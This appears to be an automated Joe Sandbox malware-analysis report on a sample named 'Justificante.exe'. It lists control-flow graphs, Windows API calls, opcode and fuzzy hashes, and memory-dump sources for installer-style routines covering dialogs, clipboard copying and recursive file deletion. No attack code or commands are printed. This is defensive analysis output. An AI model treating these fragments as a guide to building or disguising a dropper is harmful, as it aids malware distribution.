                          control_flow_graph 139 4056e3-4056fe 140 405704-4057cb GetDlgItem * 3 call 4044c7 call 404e20 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40588d-405894 139->141 159 4057e9-4057ec 140->159 160 4057cd-4057e7 SendMessageW * 2 140->160 142 405896-4058b8 GetDlgItem CreateThread CloseHandle 141->142 143 4058be-4058cb 141->143 142->143 145 4058e9-4058f3 143->145 146 4058cd-4058d3 143->146 151 4058f5-4058fb 145->151 152 405949-40594d 145->152 149 4058d5-4058e4 ShowWindow * 2 call 4044c7 146->149 150 40590e-405917 call 4044f9 146->150 149->145 163 40591c-405920 150->163 156 405923-405933 ShowWindow 151->156 157 4058fd-405909 call 40446b 151->157 152->150 154 40594f-405955 152->154 154->150 161 405957-40596a SendMessageW 154->161 164 405943-405944 call 40446b 156->164 165 405935-40593e call 4055a4 156->165 157->150 167 4057fc-405813 call 404492 159->167 168 4057ee-4057fa SendMessageW 159->168 160->159 169 405970-40599b CreatePopupMenu call 406579 AppendMenuW 161->169 170 405a6c-405a6e 161->170 164->152 165->164 178 405815-405829 ShowWindow 167->178 179 405849-40586a GetDlgItem SendMessageW 167->179 168->167 176 4059b0-4059c5 TrackPopupMenu 169->176 177 40599d-4059ad GetWindowRect 169->177 170->163 176->170 180 4059cb-4059e2 176->180 177->176 181 405838 178->181 182 40582b-405836 ShowWindow 178->182 179->170 183 405870-405888 SendMessageW * 2 179->183 184 4059e7-405a02 SendMessageW 180->184 185 40583e-405844 call 4044c7 181->185 182->185 183->170 184->184 186 405a04-405a27 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405a29-405a50 SendMessageW 186->188 188->188 189 405a52-405a66 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00405741
                          • GetDlgItem.USER32(?,000003EE), ref: 00405750
                          • GetClientRect.USER32(?,?), ref: 0040578D
                          • GetSystemMetrics.USER32(00000002), ref: 00405794
                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                          • ShowWindow.USER32(?,00000008), ref: 00405830
                          • GetDlgItem.USER32(?,000003EC), ref: 00405851
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                          • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                            • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                          • CloseHandle.KERNELBASE(00000000), ref: 004058B8
                          • ShowWindow.USER32(00000000), ref: 004058DC
                          • ShowWindow.USER32(?,00000008), ref: 004058E1
                          • ShowWindow.USER32(00000008), ref: 0040592B
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                          • CreatePopupMenu.USER32 ref: 00405970
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                          • GetWindowRect.USER32(?,?), ref: 004059A4
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                          • OpenClipboard.USER32(00000000), ref: 00405A05
                          • EmptyClipboard.USER32 ref: 00405A0B
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                          • GlobalLock.KERNEL32(00000000), ref: 00405A21
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                          • CloseClipboard.USER32 ref: 00405A66
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: H7B${
                          • API String ID: 590372296-2256286769
                          • Opcode ID: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                          • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                          • Opcode Fuzzy Hash: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                          • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 629 405c4e-405c74 call 405f19 632 405c76-405c88 DeleteFileW 629->632 633 405c8d-405c94 629->633 634 405e0a-405e0e 632->634 635 405c96-405c98 633->635 636 405ca7-405cb7 call 40653c 633->636 637 405db8-405dbd 635->637 638 405c9e-405ca1 635->638 642 405cc6-405cc7 call 405e5d 636->642 643 405cb9-405cc4 lstrcatW 636->643 637->634 641 405dbf-405dc2 637->641 638->636 638->637 644 405dc4-405dca 641->644 645 405dcc-405dd4 call 40689a 641->645 646 405ccc-405cd0 642->646 643->646 644->634 645->634 653 405dd6-405dea call 405e11 call 405c06 645->653 649 405cd2-405cda 646->649 650 405cdc-405ce2 lstrcatW 646->650 649->650 652 405ce7-405d03 lstrlenW FindFirstFileW 649->652 650->652 655 405d09-405d11 652->655 656 405dad-405db1 652->656 669 405e02-405e05 call 4055a4 653->669 670 405dec-405def 653->670 659 405d31-405d45 call 40653c 655->659 660 405d13-405d1b 655->660 656->637 658 405db3 656->658 658->637 671 405d47-405d4f 659->671 672 405d5c-405d67 call 405c06 659->672 661 405d90-405da0 FindNextFileW 660->661 662 405d1d-405d25 660->662 661->655 668 405da6-405da7 FindClose 661->668 662->659 665 405d27-405d2f 662->665 665->659 665->661 668->656 669->634 670->644 673 405df1-405e00 call 4055a4 call 406302 670->673 671->661 674 405d51-405d5a call 405c4e 671->674 682 405d88-405d8b call 4055a4 672->682 683 405d69-405d6c 672->683 673->634 674->661 682->661 686 405d80-405d86 683->686 687 405d6e-405d7e call 4055a4 call 406302 683->687 686->661 687->661
                          APIs
                          • DeleteFileW.KERNELBASE(?,?,76F93420,76F92EE0,00000000), ref: 00405C77
                          • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CBF
                          • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CE2
                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CE8
                          • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CF8
                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                          • FindClose.KERNEL32(00000000), ref: 00405DA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$PWB$\*.*
                          • API String ID: 2035342205-702506766
                          • Opcode ID: 040ab76bf041593b80ddb5614b3ecdb7f10fff1f34e6e884be80ec8d6c7c0259
                          • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                          • Opcode Fuzzy Hash: 040ab76bf041593b80ddb5614b3ecdb7f10fff1f34e6e884be80ec8d6c7c0259
                          • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                          • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                          • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                          • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                          APIs
                          • FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 004068A5
                          • FindClose.KERNEL32(00000000), ref: 004068B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                          • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                          • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                          • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                          • Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                          • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 190 404eff-404f4d GetDlgItem * 2 191 405180-405187 190->191 192 404f53-404fee GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 190->192 193 405189-405199 191->193 194 40519b 191->194 195 404ff0-404ffb SendMessageW 192->195 196 404ffd-405006 DeleteObject 192->196 197 40519e-4051a7 193->197 194->197 195->196 198 405008-405010 196->198 199 4051b2-4051b8 197->199 200 4051a9-4051ac 197->200 201 405012-405015 198->201 202 405039-40503d 198->202 206 4051c7-4051ce 199->206 207 4051ba-4051c1 199->207 200->199 203 405296-40529d 200->203 204 405017 201->204 205 40501a-405037 call 406579 SendMessageW * 2 201->205 202->198 208 40503f-40506f call 404492 * 2 202->208 213 40530e-405315 203->213 214 40529f-4052a5 203->214 204->205 205->202 210 4051d0-4051d3 206->210 211 405246-405249 206->211 207->203 207->206 249 405075-40507b 208->249 250 40513f-405152 GetWindowLongW SetWindowLongW 208->250 219 4051d5-4051dc 210->219 220 4051de-4051f4 call 404e4d 210->220 211->203 215 40524b-405255 211->215 217 405323-40532a 213->217 218 405317-405321 SendMessageW 213->218 222 405503-405515 call 4044f9 214->222 223 4052ab-4052b5 214->223 224 405265-40526f 215->224 225 405257-405263 SendMessageW 215->225 227 40532c-405333 217->227 228 40535e-405365 217->228 218->217 219->211 219->220 220->211 248 4051f6-405204 220->248 223->222 231 4052bb-4052ca SendMessageW 223->231 224->203 232 405271-405278 224->232 225->224 234 405335-405336 ImageList_Destroy 227->234 235 40533c-405343 227->235 238 4054c5-4054cc 228->238 239 40536b-405377 call 4011ef 228->239 231->222 240 4052d0-4052e1 SendMessageW 231->240 244 405289-405293 232->244 245 40527a-405287 232->245 234->235 246 405345-405346 GlobalFree 235->246 247 40534c-405358 235->247 238->222 243 4054ce-4054d5 238->243 258 405387-40538a 239->258 259 405379-40537c 239->259 241 4052e3-4052e9 240->241 242 4052eb-4052ed 240->242 241->242 253 4052ee-405307 call 401299 SendMessageW 241->253 242->253 243->222 254 4054d7-405501 ShowWindow GetDlgItem ShowWindow 243->254 244->203 245->203 246->247 247->228 248->211 256 405206-405208 248->256 257 40507e-405084 249->257 255 405158-40515b 250->255 253->213 254->222 261 405175-40517d call 4044c7 255->261 262 40515d-40516b ShowWindow call 4044c7 255->262 263 40520a-405211 256->263 264 40521b 256->264 265 405121-405134 257->265 266 40508a-4050b5 257->266 274 4053cb-4053ef call 4011ef 258->274 275 40538c-4053a5 call 4012e2 call 401299 258->275 270 40537e 259->270 271 40537f-405382 call 404ecd 259->271 261->191 285 405170 262->285 278 405213-405215 263->278 279 405217-405219 263->279 269 40521e-405243 call 40117d 264->269 265->257 273 40513a-40513d 265->273 267 4050f1-4050f3 266->267 268 4050b7-4050ef SendMessageW 266->268 280 4050f5-405107 SendMessageW 267->280 281 405109-40511e SendMessageW 267->281 268->265 269->211 270->271 271->258 273->250 273->255 292 405491-405499 274->292 293 4053f5 274->293 298 4053b5-4053c4 SendMessageW 275->298 299 4053a7-4053ad 275->299 278->269 279->269 280->265 281->265 285->222 296 4054a7-4054af 292->296 297 40549b-4054a1 InvalidateRect 292->297 294 4053f8-405403 293->294 300 405405-405414 294->300 301 405479-40548b 294->301 296->238 302 4054b1-4054c0 call 404e20 call 404e08 296->302 297->296 298->274 306 4053b0-4053b3 299->306 307 4053af 299->307 304 405416-405423 300->304 305 405427-40542a 300->305 301->292 301->294 302->238 304->305 309 405431-40543a 305->309 310 40542c-40542f 305->310 306->298 306->299 307->306 312 40543f-405477 SendMessageW * 2 309->312 313 40543c 309->313 310->312 312->301 313->312
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                          • GetDlgItem.USER32(?,00000408), ref: 00404F23
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                          • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                          • DeleteObject.GDI32(00000110), ref: 00405000
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                            • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                          • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                          • ShowWindow.USER32(?,00000005), ref: 00405162
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                          • ImageList_Destroy.COMCTL32(?), ref: 00405336
                          • GlobalFree.KERNEL32(?), ref: 00405346
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                          • ShowWindow.USER32(?,00000000), ref: 004054EF
                          • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                          • ShowWindow.USER32(00000000), ref: 00405501
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 2564846305-813528018
                          • Opcode ID: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                          • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                          • Opcode Fuzzy Hash: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                          • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 314 403fb9-403fcb 315 403fd1-403fd7 314->315 316 40410c-40411b 314->316 315->316 317 403fdd-403fe6 315->317 318 40416a-40417f 316->318 319 40411d-404165 GetDlgItem * 2 call 404492 SetClassLongW call 40140b 316->319 322 403fe8-403ff5 SetWindowPos 317->322 323 403ffb-403ffe 317->323 320 404181-404184 318->320 321 4041bf-4041c4 call 4044de 318->321 319->318 325 404186-404191 call 401389 320->325 326 4041b7-4041b9 320->326 333 4041c9-4041e4 321->333 322->323 328 404000-404012 ShowWindow 323->328 329 404018-40401e 323->329 325->326 347 404193-4041b2 SendMessageW 325->347 326->321 332 40445f 326->332 328->329 334 404020-404035 DestroyWindow 329->334 335 40403a-40403d 329->335 340 404461-404468 332->340 338 4041e6-4041e8 call 40140b 333->338 339 4041ed-4041f3 333->339 341 40443c-404442 334->341 343 404050-404056 335->343 344 40403f-40404b SetWindowLongW 335->344 338->339 350 4041f9-404204 339->350 351 40441d-404436 DestroyWindow EndDialog 339->351 341->332 349 404444-40444a 341->349 345 4040f9-404107 call 4044f9 343->345 346 40405c-40406d GetDlgItem 343->346 344->340 345->340 352 40408c-40408f 346->352 353 40406f-404086 SendMessageW IsWindowEnabled 346->353 347->340 349->332 355 40444c-404455 ShowWindow 349->355 350->351 356 40420a-404257 call 406579 call 404492 * 3 GetDlgItem 350->356 351->341 357 404091-404092 352->357 358 404094-404097 352->358 353->332 353->352 355->332 384 404261-40429d ShowWindow KiUserCallbackDispatcher call 4044b4 EnableWindow 356->384 385 404259-40425e 356->385 361 4040c2-4040c7 call 40446b 357->361 362 4040a5-4040aa 358->362 363 404099-40409f 358->363 361->345 366 4040e0-4040f3 SendMessageW 362->366 368 4040ac-4040b2 362->368 363->366 367 4040a1-4040a3 363->367 366->345 367->361 372 4040b4-4040ba call 40140b 368->372 373 4040c9-4040d2 call 40140b 368->373 382 4040c0 372->382 373->345 381 4040d4-4040de 373->381 381->382 382->361 388 4042a2 384->388 389 40429f-4042a0 384->389 385->384 390 4042a4-4042d2 GetSystemMenu EnableMenuItem SendMessageW 388->390 389->390 391 4042d4-4042e5 SendMessageW 390->391 392 4042e7 390->392 393 4042ed-40432c call 4044c7 call 403f9a call 40653c lstrlenW call 406579 SetWindowTextW call 401389 391->393 392->393 393->333 404 404332-404334 393->404 404->333 405 40433a-40433e 404->405 406 404340-404346 405->406 407 40435d-404371 DestroyWindow 405->407 406->332 409 40434c-404352 406->409 407->341 408 404377-4043a4 CreateDialogParamW 407->408 408->341 410 4043aa-404401 call 404492 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 408->410 409->333 411 404358 409->411 410->332 416 404403-404416 ShowWindow call 4044de 410->416 411->332 418 40441b 416->418 418->341
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                          • ShowWindow.USER32(?), ref: 00404012
                          • DestroyWindow.USER32 ref: 00404026
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                          • GetDlgItem.USER32(?,?), ref: 00404063
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                          • IsWindowEnabled.USER32(00000000), ref: 0040407E
                          • GetDlgItem.USER32(?,00000001), ref: 0040412C
                          • GetDlgItem.USER32(?,00000002), ref: 00404136
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                          • GetDlgItem.USER32(?,00000003), ref: 00404247
                          • ShowWindow.USER32(00000000,?), ref: 00404268
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040427A
                          • EnableWindow.USER32(?,?), ref: 00404295
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                          • EnableMenuItem.USER32(00000000), ref: 004042B2
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                          • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                          • ShowWindow.USER32(?,0000000A), ref: 0040444F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID: H7B
                          • API String ID: 3282139019-2300413410
                          • Opcode ID: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                          • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                          • Opcode Fuzzy Hash: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                          • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E

                          Control-flow Graph

                          • Executed
                          • Not Executed
